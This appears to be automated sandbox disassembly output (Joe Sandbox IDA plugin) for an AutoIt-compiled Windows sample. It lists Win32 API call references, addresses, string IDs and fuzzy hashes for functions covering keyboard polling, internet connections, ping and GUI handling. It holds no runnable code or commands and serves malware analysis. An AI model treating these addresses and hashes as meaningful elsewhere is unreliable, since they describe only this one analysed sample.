                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00FB5504
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FB5515
                                                      • CharNextW.USER32(00000158), ref: 00FB5544
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00FB5585
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00FB559B
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FB55AC
                                                      Similarity
                                                      • API ID: MessageSend$CharNext
                                                      • String ID:
                                                      • API String ID: 1350042424-0
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F7FAAF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00F7FB08
                                                      • VariantInit.OLEAUT32(?), ref: 00F7FB1A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F7FB3A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00F7FB8D
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F7FBA1
                                                      • VariantClear.OLEAUT32(?), ref: 00F7FBB6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00F7FBC3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F7FBCC
                                                      • VariantClear.OLEAUT32(?), ref: 00F7FBDE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F7FBE9
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00F89CA1
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00F89D22
                                                      • GetKeyState.USER32(000000A0), ref: 00F89D3D
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00F89D57
                                                      • GetKeyState.USER32(000000A1), ref: 00F89D6C
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00F89D84
                                                      • GetKeyState.USER32(00000011), ref: 00F89D96
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00F89DAE
                                                      • GetKeyState.USER32(00000012), ref: 00F89DC0
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00F89DD8
                                                      • GetKeyState.USER32(0000005B), ref: 00F89DEA
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00FA05BC
                                                      • inet_addr.WSOCK32(?), ref: 00FA061C
                                                      • gethostbyname.WSOCK32(?), ref: 00FA0628
                                                      • IcmpCreateFile.IPHLPAPI ref: 00FA0636
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FA06C6
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FA06E5
                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00FA07B9
                                                      • WSACleanup.WSOCK32 ref: 00FA07BF
                                                      Strings
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharLower
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 707087890-567219261
                                                      APIs
                                                      • CoInitialize.OLE32 ref: 00FA3774
                                                      • CoUninitialize.OLE32 ref: 00FA377F
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00FBFB78,?), ref: 00FA37D9
                                                      • IIDFromString.OLE32(?,?), ref: 00FA384C
                                                      • VariantInit.OLEAUT32(?), ref: 00FA38E4
                                                      • VariantClear.OLEAUT32(?), ref: 00FA3936
                                                      Strings
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 636576611-1287834457
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F933CF
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F933F0
                                                      Strings
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-3080491070
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 1256254125-769500911
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F953A0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F95416
                                                      • GetLastError.KERNEL32 ref: 00F95420
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00F954A7
                                                      Strings
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      APIs
                                                      • CreateMenu.USER32 ref: 00FB3C79
                                                      • SetMenu.USER32(?,00000000), ref: 00FB3C88
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FB3D10
                                                      • IsMenu.USER32(?), ref: 00FB3D24
                                                      • CreatePopupMenu.USER32 ref: 00FB3D2E
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FB3D5B
                                                      • DrawMenuBar.USER32 ref: 00FB3D63
                                                      Strings
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                      • String ID: 0$F
                                                      • API String ID: 161812096-3044882817
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FB3A9D
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FB3AA0
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB3AC7
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FB3AEA
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FB3B62
                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00FB3BAC
                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FB3BC7
                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00FB3BE2
                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00FB3BF6
                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00FB3C13
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F8B151
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B165
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00F8B16C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B17B
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F8B18D
                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B1A6
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B1B8
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B1FD
                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B212
                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F8A1E1,?,00000001), ref: 00F8B21D
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 77ad92bbbf860dc443d321d968df6c700c6fb9eff2c1e826ab42d039cefd0354
                                                      • Instruction ID: a8d63c6712f22a474f9cbfdd65b7afce32af1adad0eca80ec14504c1eeafe537
                                                      • Opcode Fuzzy Hash: 77ad92bbbf860dc443d321d968df6c700c6fb9eff2c1e826ab42d039cefd0354
                                                      • Instruction Fuzzy Hash: 043191B1900208BFDB11AF24DC98FBE7BADBF51325F104116FA05D6290DBB4AA40EF64
                                                      APIs
                                                      • _free.LIBCMT ref: 00F52C94
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F52CA0
                                                      • _free.LIBCMT ref: 00F52CAB
                                                      • _free.LIBCMT ref: 00F52CB6
                                                      • _free.LIBCMT ref: 00F52CC1
                                                      • _free.LIBCMT ref: 00F52CCC
                                                      • _free.LIBCMT ref: 00F52CD7
                                                      • _free.LIBCMT ref: 00F52CE2
                                                      • _free.LIBCMT ref: 00F52CED
                                                      • _free.LIBCMT ref: 00F52CFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: c48dd832a6615128033a47a5950403bb1d2606231b4ec3576b3eba3d8884ffce
                                                      • Instruction ID: af237a842eb8f141af3e89b51e8281628fedb8088428f607338e60bc00e414e5
                                                      • Opcode Fuzzy Hash: c48dd832a6615128033a47a5950403bb1d2606231b4ec3576b3eba3d8884ffce
                                                      • Instruction Fuzzy Hash: A311B476100108AFCB42EF58DC42CDD3BB5BF06351F4146A4FA486B322D635EA54BB90
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F21459
                                                      • OleUninitialize.OLE32(?,00000000), ref: 00F214F8
                                                      • UnregisterHotKey.USER32(?), ref: 00F216DD
                                                      • DestroyWindow.USER32(?), ref: 00F624B9
                                                      • FreeLibrary.KERNEL32(?), ref: 00F6251E
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F6254B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 652e770ca455ff30a0712d2820969d86d217a2d4828bacde09c07de93573427f
                                                      • Instruction ID: b01f624b24f446ebe9f5e66b3c61b6ec6af5e6bfc7d63111b173ff6d47c689c1
                                                      • Opcode Fuzzy Hash: 652e770ca455ff30a0712d2820969d86d217a2d4828bacde09c07de93573427f
                                                      • Instruction Fuzzy Hash: CFD1B231B01222CFDB29EF15D899B69F7A0BF15710F1442ADE44A6B252CB31EC12EF95
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00F25C7A
                                                        • Part of subcall function 00F25D0A: GetClientRect.USER32(?,?), ref: 00F25D30
                                                        • Part of subcall function 00F25D0A: GetWindowRect.USER32(?,?), ref: 00F25D71
                                                        • Part of subcall function 00F25D0A: ScreenToClient.USER32(?,?), ref: 00F25D99
                                                      • GetDC.USER32 ref: 00F646F5
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F64708
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F64716
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F6472B
                                                      • ReleaseDC.USER32(?,00000000), ref: 00F64733
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F647C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 6c2d766748cdce930a4c9dd0e5c0e01aed0d604324b797eb41d9e6d9efe9846a
                                                      • Instruction ID: 04e094721d3a230ca996ba8609f3e1025d3cc94b91c7d8cd3afedd0859f4dd96
                                                      • Opcode Fuzzy Hash: 6c2d766748cdce930a4c9dd0e5c0e01aed0d604324b797eb41d9e6d9efe9846a
                                                      • Instruction Fuzzy Hash: 3371FF31800209DFCF21AF64C984AFA7BB6FF4A364F144269ED555A2A6D335A841FF60
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00F935E4
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • LoadStringW.USER32(00FF2390,?,00000FFF,?), ref: 00F9360A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-2391861430
                                                      • Opcode ID: 3030bfbf5fce14303644b1f23ed3ec7e0a6cf2d22743d42fe1a37a739ac5d10b
                                                      • Instruction ID: 61529080c406f3c37775a4e16dac2b12a9264a1832b582e7e161a1211c9b267a
                                                      • Opcode Fuzzy Hash: 3030bfbf5fce14303644b1f23ed3ec7e0a6cf2d22743d42fe1a37a739ac5d10b
                                                      • Instruction Fuzzy Hash: 23518F72C0421AAADF14EBE0DC42EEEBB78AF14300F144125F105B21A1DB795B98FFA1
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                        • Part of subcall function 00F3912D: GetCursorPos.USER32(?), ref: 00F39141
                                                        • Part of subcall function 00F3912D: ScreenToClient.USER32(00000000,?), ref: 00F3915E
                                                        • Part of subcall function 00F3912D: GetAsyncKeyState.USER32(00000001), ref: 00F39183
                                                        • Part of subcall function 00F3912D: GetAsyncKeyState.USER32(00000002), ref: 00F3919D
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00FB8B6B
                                                      • ImageList_EndDrag.COMCTL32 ref: 00FB8B71
                                                      • ReleaseCapture.USER32 ref: 00FB8B77
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00FB8C12
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FB8C25
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00FB8CFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 1924731296-2107944366
                                                      • Opcode ID: 459fd3873083b031117dd295081fec04b449ac2a93d4b44dccd4234a8aeb6a88
                                                      • Instruction ID: 597f2a21089d4e1a1bdd3d9a8cdbe11b627d3316e17490eb8ae4bf5590157cf7
                                                      • Opcode Fuzzy Hash: 459fd3873083b031117dd295081fec04b449ac2a93d4b44dccd4234a8aeb6a88
                                                      • Instruction Fuzzy Hash: D0519EB1504304AFD710EF11DC95FAA77E8FB88750F00062DF955A72A1CBB5A904EFA2
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F9C272
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F9C29A
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F9C2CA
                                                      • GetLastError.KERNEL32 ref: 00F9C322
                                                      • SetEvent.KERNEL32(?), ref: 00F9C336
                                                      • InternetCloseHandle.WININET(00000000), ref: 00F9C341
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: 474e4cba0b8c8ad8af19b3f37a6a0e2229beceaeaaed10d791e5f33088d7250f
                                                      • Instruction ID: b909ccfb2b0f2d377be44a55faf5a8e2237afe637f5ca0df775eb2ed393266ea
                                                      • Opcode Fuzzy Hash: 474e4cba0b8c8ad8af19b3f37a6a0e2229beceaeaaed10d791e5f33088d7250f
                                                      • Instruction Fuzzy Hash: A7314CB1A00608AFEB219F65CC88EAB7BFCEB49754B14851EF446D2211DB34DD04ABE1
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F63AAF,?,?,Bad directive syntax error,00FBCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F898BC
                                                      • LoadStringW.USER32(00000000,?,00F63AAF,?), ref: 00F898C3
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F89987
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 858772685-4153970271
                                                      • Opcode ID: c76b5af8ce820963091ef0d2004bc73876c3837c84e7c0a73d89b6612234ec71
                                                      • Instruction ID: f20c5a6a8b8f221fda018bd9d53fb85de57911f79d210348a9e9d67c94387333
                                                      • Opcode Fuzzy Hash: c76b5af8ce820963091ef0d2004bc73876c3837c84e7c0a73d89b6612234ec71
                                                      • Instruction Fuzzy Hash: 62218271C0421EABCF15EF90DC06EEE7735BF18300F084425F515620A1DB799A18FB51
                                                      APIs
                                                      • GetParent.USER32 ref: 00F820AB
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00F820C0
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F8214D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1290815626-3381328864
                                                      • Opcode ID: 92cac54bc33e6e7794e70d2530d41a3ad1e09a3855c2fa0200eb38dabbf68a1c
                                                      • Instruction ID: eeb32902aad82d23f0b024aacab04e82c2011b93c5e4171ccda90469cee56537
                                                      • Opcode Fuzzy Hash: 92cac54bc33e6e7794e70d2530d41a3ad1e09a3855c2fa0200eb38dabbf68a1c
                                                      • Instruction Fuzzy Hash: EB11C677A88B06BAF6017621DC0AEE7379DDB05728B300116FB04B51E2FEA9B8417B55
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                      • String ID:
                                                      • API String ID: 1282221369-0
                                                      • Opcode ID: 821ab511e0141f7ab26aeac7b9aafeadb4abaf10e901ad5e4fea3876c0546a32
                                                      • Instruction ID: b39d2d5da4669a2f9aaa6c84cc84d6d9fe85b83ad4179b08f538bec2b77f61d4
                                                      • Opcode Fuzzy Hash: 821ab511e0141f7ab26aeac7b9aafeadb4abaf10e901ad5e4fea3876c0546a32
                                                      • Instruction Fuzzy Hash: 10610771D043046FDB21AFB49C81A6D7BE9AF05722F04416DEF46A7282DB359909F7E0
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F76890
                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F768A9
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F768B9
                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F768D1
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F768F2
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F38874,00000000,00000000,00000000,000000FF,00000000), ref: 00F76901
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F7691E
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F38874,00000000,00000000,00000000,000000FF,00000000), ref: 00F7692D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                      • String ID:
                                                      • API String ID: 1268354404-0
                                                      • Opcode ID: 3ee2c240a45b128e0fc3cf34599b790121c322bbc6cee6c3b0688e72832b8193
                                                      • Instruction ID: fc6da4cfdcc503eeddfd9e4d07df48459e5c54ac2f097f14ce8090c86a21dede
                                                      • Opcode Fuzzy Hash: 3ee2c240a45b128e0fc3cf34599b790121c322bbc6cee6c3b0688e72832b8193
                                                      • Instruction Fuzzy Hash: D2514970A0070AEFDB20CF24CC95BAA7BB5FF88760F104519F956D72A0DBB4A951EB50
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F9C182
                                                      • GetLastError.KERNEL32 ref: 00F9C195
                                                      • SetEvent.KERNEL32(?), ref: 00F9C1A9
                                                        • Part of subcall function 00F9C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F9C272
                                                        • Part of subcall function 00F9C253: GetLastError.KERNEL32 ref: 00F9C322
                                                        • Part of subcall function 00F9C253: SetEvent.KERNEL32(?), ref: 00F9C336
                                                        • Part of subcall function 00F9C253: InternetCloseHandle.WININET(00000000), ref: 00F9C341
                                                      Similarity
                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 337547030-0
